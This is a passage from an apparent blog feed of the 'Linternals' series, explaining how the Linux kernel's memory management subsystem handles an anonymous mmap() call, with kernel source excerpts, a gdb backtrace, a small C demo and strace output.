</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="nf">map_deny_write_exec</span><span class="p">(</span><span class="n">vma</span><span class="p">,</span> <span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_flags</span><span class="p">))</span> <span class="p">{</span>     <span class="p">[</span><span class="mi">8</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="n">error</span> <span class="o">=</span> <span class="o">-</span><span class="n">EACCES</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">goto</span> <span class="n">close_and_free_vma</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="cm">/* Allow architectures to sanity-check the vm_flags */</span>
</span></span><span class="line"><span class="cl">	<span class="n">error</span> <span class="o">=</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nf">arch_validate_flags</span><span class="p">(</span><span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_flags</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">		<span class="k">goto</span> <span class="n">close_and_free_vma</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">error</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="nf">vma_iter_prealloc</span><span class="p">(</span><span class="o">&amp;</span><span class="n">vmi</span><span class="p">,</span> <span class="n">vma</span><span class="p">))</span>                  <span class="p">[</span><span class="mi">9</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">		<span class="k">goto</span> <span class="n">close_and_free_vma</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="cm">/* Lock the VMA since it is modified after insertion into VMA tree */</span>
</span></span><span class="line"><span class="cl">	<span class="nf">vma_start_write</span><span class="p">(</span><span class="n">vma</span><span class="p">);</span>                              <span class="p">[</span><span class="mi">10</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="nf">vma_iter_store</span><span class="p">(</span><span class="o">&amp;</span><span class="n">vmi</span><span class="p">,</span> <span class="n">vma</span><span class="p">);</span>                         <span class="p">[</span><span class="mi">11</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">	<span class="n">mm</span><span class="o">-&gt;</span><span class="n">map_count</span><span class="o">++</span><span class="p">;</span>                                   <span class="p">[</span><span class="mi">12</span><span class="p">]</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></p>
<p>Most of this is fairly straightforward: we allocate a new <code>struct vm_area_struct</code> [0], update the iterator [1], update the <code>vma</code> start/end/pgoff [2], its flags and protections [3][4].</p>
<p>Next, there&rsquo;s some mapping type specific initialisation depending on if its a file-backed [5], shared anonymous [6] or private anonymous mapping [7]. In this case, <code>[vma_set_anonymous()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L909)</code> simply sets <code>vma-&gt;vm_ops = NULL</code>. This field being NULL is what determines it as (private) anonymous vma (as seen by the equivalent <code>[vma_is_anonymous()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L914)</code> check).</p>
<p>There is then a security check [8], <code>[map_deny_write_exec()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mman.h#L192)</code>, which will prevent the creation of mapping with write and execute permissions if the <code>mm</code> has the <code>MMF_HAS_MDWE</code> flag set (note a similar check is also done by selinux via the <code>mmap_file</code> hook).</p>
<p>Finally, our <code>vma</code> is ready to be inserted into the <code>mm-&gt;mm_mt</code>, this is done by first preallocating enough nodes for the insertion (store) [9].</p>
<p>Then, if <code>CONFIG_PER_VMA_LOCK=y</code>, the per-vma write lock will be taken [10], which acts as a r/w semaphore in practice. This is interesting, because you might notice there is no subsequent <code>[vma_start_write()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L740)</code>. That&rsquo;s because all vma write locks are unlocked automatically when the mmap write lock is released, <a href="https://docs.kernel.org/mm/process_addrs.html#locking">read more here</a>.  </p>
<p>Finally our new mapping is inserted into the <code>mm-&gt;mm_mt</code> tree via the iterator [11], using <code>[vma_iter_store()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/internal.h#L1437)</code>, and the processes&rsquo; total mapping count is updated [12].</p>
<h3 id="final-bits">Final Bits</h3>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl">	<span class="nf">vm_stat_account</span><span class="p">(</span><span class="n">mm</span><span class="p">,</span> <span class="n">vm_flags</span><span class="p">,</span> <span class="n">len</span> <span class="o">&gt;&gt;</span> <span class="n">PAGE_SHIFT</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="c1">// SNIP
</span></span></span><span class="line"><span class="cl">    
</span></span><span class="line"><span class="cl">	<span class="cm">/*
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * New (or expanded) vma always get soft dirty status.
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * Otherwise user-space soft-dirty page tracker won&#39;t
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * be able to distinguish situation when vma area unmapped,
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * then new mapped in-place (which must be aimed as
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * a completely new data area).
</span></span></span><span class="line"><span class="cl"><span class="cm">	 */</span>
</span></span><span class="line"><span class="cl">	<span class="nf">vm_flags_set</span><span class="p">(</span><span class="n">vma</span><span class="p">,</span> <span class="n">VM_SOFTDIRTY</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="nf">vma_set_page_prot</span><span class="p">(</span><span class="n">vma</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="nf">validate_mm</span><span class="p">(</span><span class="n">mm</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="n">addr</span><span class="p">;</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849">mm/mmap.c</a></p>
<p>There&rsquo;s some bits we&rsquo;ve skipped related to files or huge pages, but eventually we&rsquo;ll get here to the end of the function (we&rsquo;re almost there!!). So what&rsquo;s left to do?</p>
<p>Some accounting of course! <code>[vm_stat_account()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L3612)</code> updates various <code>mm</code> stat fields tracking the types of mappings, including: <code>mm-&gt;total_vm</code> (total pages), <code>mm-&gt;exec_vm</code>, <code>mm-&gt;stack_vm</code> and <code>mm-&gt;data_vm</code> (private, writable, not stack).</p>
<p>Now, regardless of whether this is a new or expanded vma, the <code>VM_SOFTDIRTY</code> flag is set. Dirty is memory management speech for &ldquo;this has been modified btw!&rdquo;. Typically this is in the context of changes to a file in memory that aren&rsquo;t written to disk yet. Here, if <code>CONFIG_MEM_SOFT_DIRTY=y</code>, is used this bit is set to indicate that that the vma has been modified (as I understand it, the &ldquo;soft&rdquo; part means it doesn&rsquo;t require immediate action by the kernel, but will be checked when the next relevant action is taken). We&rsquo;ll touch more on what these &ldquo;actions&rdquo; are in the next section when we cover paging.</p>
<p><code>[vma_set_page_prot()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L90)</code> will update <code>vma-&gt;vm_page_prot</code> to reflect <code>vma-&gt;vm_flags</code>. Next is <code>[validate_mm()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L322)</code>, which is a debugging function that validates the state of the memory mappings. This is only enabled on debug builds with <code>CONFIG_DEBUG_VM_MAPLE_TREE=y</code>.</p>
<p>And last, but not least, we return the <code>addr</code> of our new mapping, which will propagate back, if all is valid, to the return value of the userspace <code>mmap()</code> call.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">#0  mmap_region (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=140379443372032, len=len@entry=4096, vm_flags=vm_flags@entry=115, 
</span></span><span class="line"><span class="cl">    pgoff=pgoff@entry=34272325042, uf=uf@entry=0xffffc900006bbef0) at mm/mmap.c:2852
</span></span><span class="line"><span class="cl">#1  0xffffffff81247544 in do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=140379443372032, addr@entry=0, len=len@entry=4096, 
</span></span><span class="line"><span class="cl">    prot=&lt;optimized out&gt;, prot@entry=3, flags=flags@entry=34, vm_flags=&lt;optimized out&gt;, vm_flags@entry=0, pgoff=&lt;optimized out&gt;, 
</span></span><span class="line"><span class="cl">    populate=0xffffc900006bbee8, uf=0xffffc900006bbef0) at mm/mmap.c:1468
</span></span><span class="line"><span class="cl">#2  0xffffffff812160c7 in vm_mmap_pgoff (file=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, prot=3, flag=34, pgoff=0) at mm/util.c:588
</span></span><span class="line"><span class="cl">#3  0xffffffff81f8e8fe in do_syscall_x64 (regs=0xffffc900006bbf58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:52
</span></span><span class="line"><span class="cl">#4  do_syscall_64 (regs=0xffffc900006bbf58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:83
</span></span><span class="line"><span class="cl">#5  0xffffffff82000130 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:121
</span></span></code></pre></div><p>Not much happens when we return back to <code>do_mmap()</code>, other than deciding how many pages, if any, need to be populated, before returning to <code>vm_mmap_pgoff()</code>. This function will then drop the mmap write lock and do any relevant userfaultfd and population bits.</p>
<p>Although out of scope, populating a mapping essentially involves doing what we&rsquo;re going to cover in the next section (writing to memory) now, instead of waiting to access it.</p>
<p>Then we&rsquo;re pretty much back in userspace, with a shiny new (or merged) mapping!</p>
<h3 id="summary">Summary</h3>
<p><img src="https://sam4k.com/content/images/2025/04/confused.gif" alt=""></p>
<p>It&rsquo;s only been, uh, 6000 words or so but just like that we&rsquo;ve covered this line of code:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
</span></span></code></pre></div><p>We did a whistle-stop (?!) tour of the <code>mmap()</code> system call, focusing on how private, anonymous mappings are created and managed by the kernel.</p>
<p>We got some first hand experience of how the <code>struct mm_struct</code> helps manages a processes memory, including the <code>mm-&gt;mm_mt</code> tree which tracks the memory areas within the processes virtual address space, which are represented by <code>struct vm_area_struct</code>.</p>
<p>We also dived into some implementation details, covering some of the security mechanisms and checks, how unused addresses for new mappings are found and the different cases that need to be considered when mapping a new region.</p>
<hr>
<ol>
<li>If you&rsquo;re curious why <code>mmap_min_addr</code> is a thing, this mitigation was added way back in 2009 for 2.X kernels. For context then, <a href="https://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html">check out this post from 2009</a> on bypassing it. For a bonus, there was <a href="https://googleprojectzero.blogspot.com/2023/01/exploiting-null-dereferences-in-linux.html">a semi recent P0 post</a> about modern NULL ptr deref exploitation.</li>
<li><a href="https://www.kernel.org/doc/html/next/userspace-api/mseal.html">https://www.kernel.org/doc/html/next/userspace-api/mseal.html</a></li>
</ol>
<h2 id="next-time">Next Time</h2>
<p><img src="https://sam4k.com/content/images/2025/04/weary_pc.gif" alt=""></p>
<p>Wow, I may have got a bit lost in the sauce for this one (sorry)&hellip; Hopefully this is useful for someone. This time we covered the first portion of our simple program: mapping memory. Next time, we&rsquo;ll move onto writing to memory. Buckle up, as that&rsquo;ll involve a deep dive into how the kernel does all things (*specifically pertaining to our case study) paging, starting with page faults and going from there (wish me luck).</p>
<p>That said, I think my next post might be more exploitation focused, both for my own sanity after this 6000 word linternals dump and also as it&rsquo;s been a while since I published some security stuff. Anyways, like I said, I&rsquo;m hoping this post bordered more on the &ldquo;in depth but verbose walkthrough of linux internals&rdquo; and not &ldquo;mad ramblings of someone who overcommitted to an ambitious series&rdquo;.</p>
<p>As always feel free to @me (on <a href="https://twitter.com/sam4k1">X</a>, <a href="https://bsky.app/profile/sam4k.com">Bluesky</a> or less commonly used <a href="https://infosec.exchange/@sam4k">Mastodon</a>) if you have any questions, suggestions or corrections :)</p>
]]></content:encoded></item><item><title>Linternals: Exploring The mm Subsystem via mmap [0x01]</title><description>In this series we&amp;#39;ll explore the Linux kernel&amp;#39;s memory management subsystem, using a simple userspace program as our starting point.</description><link>https://sam4k.com/linternals-exploring-the-mm-subsystem-part-1/</link><guid isPermaLink="false">67010c30de619fc1154ef57d</guid><category>linux</category><category>kernel</category><category>memory</category><dc:creator>sam4k</dc:creator><pubDate>Mon, 16 Dec 2024 14:00:01 +0000</pubDate><media:content url="https://sam4k.com/content/images/2024/10/linternals.gif" medium="image"/><content:encoded><![CDATA[<p>That&rsquo;s right, you&rsquo;re not hallucinating, Linternals is back! It&rsquo;s been a <em>while</em>, I know, but after some travelling and moving to a new role, I&rsquo;ve finally found some time to ramble.</p>
<p>For those of you unfamiliar with the series (or have understandably forgotten that it existed), I&rsquo;ve covered several topics relating to kernel memory management previously:</p>
<ul>
<li><a href="https://sam4k.com/linternals/#virtual-memory">The &ldquo;Virtual Memory&rdquo; series</a> of posts discusses the differences between physical and virtual memory, exploring both the user and kernel virtual address spaces</li>
<li><a href="https://sam4k.com/linternals/#memory-allocators">The series on &ldquo;Memory Allocators&rdquo;</a> covers the role of memory allocators in general before moving onto to detailing the kernel&rsquo;s page and slab allocators</li>
</ul>
<p>This post might be a little different, as I&rsquo;m writing this introduction before I&rsquo;ve actually planned 100% what I&rsquo;ll be writing about. I know I want to explore the memory management (mm) subsystem in more detail, building on what we&rsquo;ve covered so far, but the issue is&hellip;</p>
<p><img src="https://sam4k.com/content/images/2024/12/idk_where_to_begin.gif" alt=""></p>
<p>There&rsquo;s a LOT to this subsystem, it&rsquo;s integral to the kernel and interacts with lots of other components. This had me thinking - how do I cover this gargantuan, messy topic in a structured and accessible way?! Where do I begin?? What do I cover???</p>
<p>My plan is to take a leaf out of how I would normally approach researching a new topic like this: start with a high level action (e.g. what the user sees) and follow the source, building up an understanding of the relevant structures and API as we go.</p>
<p>So we&rsquo;ll take a simple action - mapping and writing to some (anonymous) memory in userspace - and see how deep we can go into the kernel, exploring what is actually going on under the hood. <em>Hopefully</em> this will provide an interesting and informative read, giving some insights on some of the key structures and functions of the kernel&rsquo;s mm subsystem.</p>
<p>🐧</p>
<p>This post is based on the latest kernel at the time of writing, 6.11.5, and x86_64.</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#what-is-memory-management">What is Memory Management?</a></li>
<li><a href="#overview-of-the-mm-subsystem">Overview of The MM Subsystem</a>
<ul>
<li><a href="#representing-memory">Representing Memory</a></li>
<li><a href="#allocating-memory">Allocating Memory</a></li>
<li><a href="#mapping-memory">Mapping Memory</a></li>
<li><a href="#managing-memory">Managing Memory</a></li>
</ul>
</li>
<li><a href="#getting-lost-in-the-source">Getting Lost in The Source</a></li>
<li><a href="#mapping-memory-1">Mapping Memory</a>
<ul>
<li><a href="#entering-the-kernel">Entering The Kernel</a></li>
<li><a href="#x64sysmmap"><code>__x64_sys_mmap()</code></a></li>
<li><a href="#ksysmmappgoff"><code>ksys_mmap_pgoff()</code></a></li>
<li><a href="#vmmmappgoff"><code>vm_mmap_pgoff()</code></a>
<ul>
<li><a href="#fetching-our-mmstruct">Fetching Our <code>mm_struct</code></a></li>
<li><a href="#a-bit-of-security">A Bit Of Security</a></li>
<li><a href="#locking">Locking</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#next-time">Next Time</a></li>
</ul>
<h2 id="what-is-memory-management">What is Memory Management?</h2>
<p>So before we get stuck into the nitty-gritty details, let&rsquo;s talk about what we mean by memory management. Fortunately, unlike some of the topics we&rsquo;ve covered (I&rsquo;m looking at you SLUB), this one&rsquo;s fairly self explanatory: it&rsquo;s about managing a system&rsquo;s memory.</p>
<p><img src="https://sam4k.com/content/images/2024/12/lets_break_it_down.gif" alt=""></p>
<p>Memory, in this sense, covers the range of storage a modern system may use: HDDs and SSDs, RAM, CPU registers and caches etc. Managing this involves providing representations of the various types of memory and means for the kernel and userspace to efficiently access and utilise them.</p>
<p>Let&rsquo;s take the everyday (and oversimplified) example of running a program on our computer. We can see involvement of memory management every step of the way:</p>
<ul>
<li>First, the program itself is stored on disk and must be read</li>
<li>It is then loaded into RAM, where the physical address in memory is mapped into our process&rsquo; virtual address space; commonly loaded data will make use of caches</li>
<li>We&rsquo;ve talked about how the kernel and userspace have their own virtual address spaces, with their own mappings and protections which need to be managed</li>
<li>Then we have the execution of the code itself which will make use of various CPU registers, it will also need to ask the kernel to do privileged things via system calls, so we also need to consider the transition between userspace and the kernel!</li>
</ul>
<p>Hopefully this highlights how fundamental the memory management subsystem is and gives a glimpse at its many responsibilities.</p>
<h2 id="overview-of-the-mm-subsystem">Overview of The MM Subsystem</h2>
<p><img src="https://sam4k.com/content/images/2024/12/tell_me_more.gif" alt=""></p>
<p>Okay, what does this <em>actually</em> look like? The kernel has several <a href="https://docs.kernel.org/subsystem-apis.html">core subsystems</a>, one of which is the <a href="https://docs.kernel.org/mm/index.html">memory management subsystem</a>. Looking at the kernel source tree, this is located in the aptly named <code>[mm/](https://elixir.bootlin.com/linux/v6.11.5/source/mm)</code> subdirectory.</p>
<p>I figured we could highlight some of the key files in there to give a sense of the subsystems role and structure in a more tangible context. Like many of my decisions, this turned out to be harder than I thought, but we&rsquo;ll give it a go.</p>
<h3 id="representing-memory">Representing Memory</h3>
<p>To be able to manage memory, we need to be able represent it in a way the kernel can work with. There are a number of key structures used by the <code>[mm/](https://elixir.bootlin.com/linux/v6.11.5/source/mm)</code> subsystem, many of which can be found in <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h">include/linux/mm_types.h</a>. This includes:</p>
<ul>
<li>Representations for chunks of physically contiguous memory (<code>[struct page](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L72)</code>) and the tables used to organise how this memory is accessed.</li>
<li>The <code>[struct mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779)</code> provides a description of a process&rsquo; virtual address space, including its different areas of virtual memory (<code>[struct vm_area_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L664)</code>).</li>
<li>The <code>[mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779)</code> also includes a pointer to the upper most table (<code>[pgd_t * pgd](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L806)</code>) which is used to map our process&rsquo; virtual addresses to a specific page in physical memory.</li>
</ul>
<h3 id="allocating-memory">Allocating Memory</h3>
<p>With our memory represented, we need a way to actually make use of it! The various allocation mechanisms fall under the memory management subsystem, providing ways to manage the pool of available physical memory and allocate it to be used. This includes:</p>
<ul>
<li>The page allocator (<code>[mm/page_alloc.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/page_alloc.c)</code>) for allocating physically contiguous memory of at least <code>[PAGE_SIZE](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/page_types.h#L11)</code>.</li>
<li>The slab allocator for the efficient allocation of (physically contiguous) objects, via the <code>[kmalloc()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/slab.h#L687)</code> API. <code>[mm/slab.h](https://elixir.bootlin.com/linux/v6.11.5/source/mm/slab.h)</code> and <code>[mm/slab_common.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/slab_common.c)</code> define the common API, while the SLUB implementation can be found at <code>[mm/slub.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/slub.c)</code>.</li>
<li><code>[mm/vmalloc.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c)</code> provides an alternative API for allocating <em><strong>virtually</strong></em> contiguous memory and is used for large allocations that may be hard to find physically contiguous space for. E.g. <code>[kvmalloc()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/slab.h#L817)</code> will <code>[kmalloc()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/slab.h#L687)</code> but use <code>[vmalloc()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/vmalloc.h#L144)</code> as a fallback!</li>
</ul>
<h3 id="mapping-memory">Mapping Memory</h3>
<p>So far we&rsquo;ve touched mainly on how to manage physical memory, but as we know there&rsquo;s a lot more to it than that! Sure, we can map chunks of physical memory into our virtual address space to work on, but what about stuff that sits on disk?</p>
<ul>
<li><code>[mmap(2)](https://man7.org/linux/man-pages/man2/mmap.2.html)</code> (<code>[mm/mmap.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1521)</code>) is one-stop shop for userspace mappings and allows us to map physical memory into our processes&rsquo; virtual address space so we can access it. This can be anonymous memory (i.e. just a chunk of physical memory for us to use) or it can also be used to map a previously opened file into physical memory too!</li>
<li><code>[mm/filemap.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/filemap.c)</code> contains some core, generic, functionality for managing file mappings, including the use of a page cache for file data. This can then be utilised by file systems when they <code>[read(2)](https://man7.org/linux/man-pages/man2/read.2.html)</code> or <code>[write(2)](https://man7.org/linux/man-pages/man2/write.2.html)</code> files for example.</li>
<li>The <code>[ioremap()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322)</code> API ( is used for mapping device memory into the kernel virtual address space. An example would be a GPU kernel driver mapping some GPU memory into the kernel virtual address so it can access it. If you recall the <a href="https://sam4k.com/linternals-virtual-memory-part-3/#kernel-virtual-memory-map">post on the kernel virtual address space</a>, you&rsquo;ll see that the kernel memory map has a specific region for <code>[ioremap()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322)</code>/<code>[vmalloc()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/vmalloc.h#L144)</code>&rsquo;d memory! And why do they share memory? Because under the hood <code>[ioremap()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322)</code> uses the <code>[vmap()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c#L3404)</code> API&hellip;</li>
<li>The <code>[vmap()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c#L3404)</code> API allows the kernel to map a set of physical pages to a range of a contiguous virtual addresses (within the vmalloc/ioremap space) space. As we&rsquo;ve mentioned, this used by both <code>[vmalloc()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/vmalloc.h#L144)</code> and <code>[ioremap()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322)</code>. As a result you can find some functionality for all of them in <code>[mm/vmalloc.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c)</code>.</li>
</ul>
<h3 id="managing-memory">Managing Memory</h3>
<p>We&rsquo;ve talked a lot about the building blocks for managing memory, but what about actual high level management of memory? Well there&rsquo;s plenty of that too!</p>
<ul>
<li>There are a number of syscalls found in <code>[mm/](https://elixir.bootlin.com/linux/v6.11.5/source/mm)</code> related to memory management: <code>[mmap(2)](https://man7.org/linux/man-pages/man2/mmap.2.html)</code> and <code>[munmap(2)](https://man7.org/linux/man-pages/man2/mmap.2.html)</code> for managing mappings, <code>[mprotect(2)](https://man7.org/linux/man-pages/man2/mprotect.2.html)</code> for managing access protections of mappings, <code>[madvise(2)](https://man7.org/linux/man-pages/man2/madvise.2.html)</code> for giving the kernel advise on how to handle mapped pages, <code>[mlock(2)](https://man7.org/linux/man-pages/man2/mlock.2.html)</code> and <code>[munlock(2)](https://man7.org/linux/man-pages/man2/mlock.2.html)</code> to un/lock memory in RAM etc.</li>
<li>We also have other key management functionality such as how to handle when the system runs out of memory (<code>[mm/oom_kill.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/oom_kill.c)</code>) and the memory control groups (memcgs, <code>[mm/memcontrol.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/memcontrol.c)</code>) which provide a way to manage the resources available to specific groups of processes.</li>
<li><code>[mm/swapfile.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/swapfile.c)</code> allows us to allocate &ldquo;swap&rdquo; files. This allows the kernel to use the a portion of disk space (the swap file) as an extension of physical memory. When physical memory availability is low, the kernel will &ldquo;swap&rdquo; out inactive/old pages of physical memory to the swap file in order to free up physical memory.</li>
</ul>
<h2 id="getting-lost-in-the-source">Getting Lost in The Source</h2>
<p><img src="https://sam4k.com/content/images/2024/12/going_on_an_adventure.gif" alt=""></p>
<p>Alright, here&rsquo;s the plan: we will begin our journey with a simple C program that maps some anonymous memory, writes to it and then unmaps it. Sounds easy enough right?</p>
<p>To refresh, &ldquo;mapping&rdquo; memory essentially involves pointing some portion of our processes virtual address space to somewhere in physical memory. This could be a file read into physical memory, but we can also map &ldquo;anonymous&rdquo; memory. This is just physical memory that has been allocated specifically for this mapping and wasn&rsquo;t previously tied to a file. But we&rsquo;ll get into that more shortly, for now, here&rsquo;s the code:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;sys/mman.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="kt">void</span> <span class="o">*</span><span class="n">addr</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">addr</span> <span class="o">=</span> <span class="nf">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_PRIVATE</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="o">*</span><span class="p">(</span><span class="kt">long</span><span class="o">*</span><span class="p">)</span><span class="n">addr</span> <span class="o">=</span> <span class="mh">0x4142434445464748</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">munmap</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>So what&rsquo;s going on here? We map <code>0x1000</code> bytes (i.e. a page) of anonymous memory into our virtual address space, pointed to by <code>addr</code>. We then write 8 bytes, <code>0x4142434445464748</code>, to that address (which points to a page in physical memory). With our work done, we then unmap the anonymous memory and exit.</p>
<p>Okay, now we understand what the program is doing from a user&rsquo;s perspective - we&rsquo;re just writing some bytes to some physical memory we allocated. But what&rsquo;s the kernel actually doing under the hood? The primary API between the userspace and the kernel is system calls, so we can use <code>[strace](https://man7.org/linux/man-pages/man1/strace.1.html)</code> to understand how our little program interacts with the kernel. Perhaps unsurprisingly, it&rsquo;s not too dissimilar:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">&gt; strace ./mm_example
</span></span><span class="line"><span class="cl">// snip (process setup)
</span></span><span class="line"><span class="cl">mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f487ed24000
</span></span><span class="line"><span class="cl">munmap(0x7f487ed24000, 4096)            = 0
</span></span><span class="line"><span class="cl">exit_group(0)
</span></span><span class="line"><span class="cl">+++ exited with 0 +++
</span></span></code></pre></div><p>The libc <code>mmap()</code> and <code>munmap()</code> calls are just wrappers around the respective system calls, which we can see here. The only part of the program that doesn&rsquo;t use system calls is when we write to the memory, but as we&rsquo;ll soon see, that doesn&rsquo;t mean the kernel isn&rsquo;t involved!</p>
<h2 id="mapping-memory-1">Mapping Memory</h2>
<p><img src="https://sam4k.com/content/images/2024/12/kermit_map.gif" alt=""></p>
<p>So let&rsquo;s start our dive into into the kernel with seeing how memory is mapped.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">void</span> <span class="o">*</span><span class="nf">mmap</span><span class="p">(</span><span class="kt">void</span> <span class="n">addr</span><span class="p">[.</span><span class="n">length</span><span class="p">],</span> <span class="kt">size_t</span> <span class="n">length</span><span class="p">,</span> <span class="kt">int</span> <span class="n">prot</span><span class="p">,</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">                  <span class="kt">int</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">off_t</span> <span class="n">offset</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">munmap</span><span class="p">(</span><span class="kt">void</span> <span class="n">addr</span><span class="p">[.</span><span class="n">length</span><span class="p">],</span> <span class="kt">size_t</span> <span class="n">length</span><span class="p">);</span>
